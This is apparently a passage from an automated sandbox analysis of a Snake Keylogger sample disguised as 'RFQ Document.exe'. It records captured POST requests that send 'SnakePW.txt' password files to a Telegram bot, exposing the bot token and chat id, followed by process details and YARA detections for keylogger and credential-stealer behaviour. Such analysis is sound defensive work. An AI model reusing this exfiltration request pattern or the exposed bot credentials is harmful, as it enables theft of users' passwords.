                                            2021-09-28 05:58:41 UTC154OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 36 62 32 34 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ce6b24c9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:41 UTC154INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:41 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:41 UTC154INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12679,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808721,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            97192.168.2.449873149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:42 UTC155OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ce91498c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:42 UTC155OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 39 31 34 39 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ce91498cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:42 UTC156INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:42 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:42 UTC156INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12680,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808722,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            98192.168.2.449874149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:42 UTC156OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ceb76f1c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:42 UTC157OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 62 37 36 66 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ceb76f1cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:42 UTC157INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:42 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:42 UTC158INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12681,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808722,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            99192.168.2.449875149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:42 UTC158OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cecf467e
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:42 UTC158OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 63 66 34 36 37 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cecf467eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:42 UTC159INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:42 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:42 UTC159INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12682,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808722,"d


                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: RFQ Document.exe PID: 2628 Parent PID: 5288

                                            General

                                            Start time:07:57:55
                                            Start date:28/09/2021
                                            Path:C:\Users\user\Desktop\RFQ Document.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\RFQ Document.exe'
                                            Imagebase:0x400000
                                            File size:344837 bytes
                                            MD5 hash:64468B2AB541687572CE6B435B41F2BD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            Analysis Process: RFQ Document.exe PID: 6484 Parent PID: 2628

                                            General

                                            Start time:07:57:57
                                            Start date:28/09/2021
                                            Path:C:\Users\user\Desktop\RFQ Document.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\RFQ Document.exe'
                                            Imagebase:0x400000
                                            File size:344837 bytes
                                            MD5 hash:64468B2AB541687572CE6B435B41F2BD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, Author: Joe Security
                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            Disassembly

                                            Code Analysis

                                            Reset < >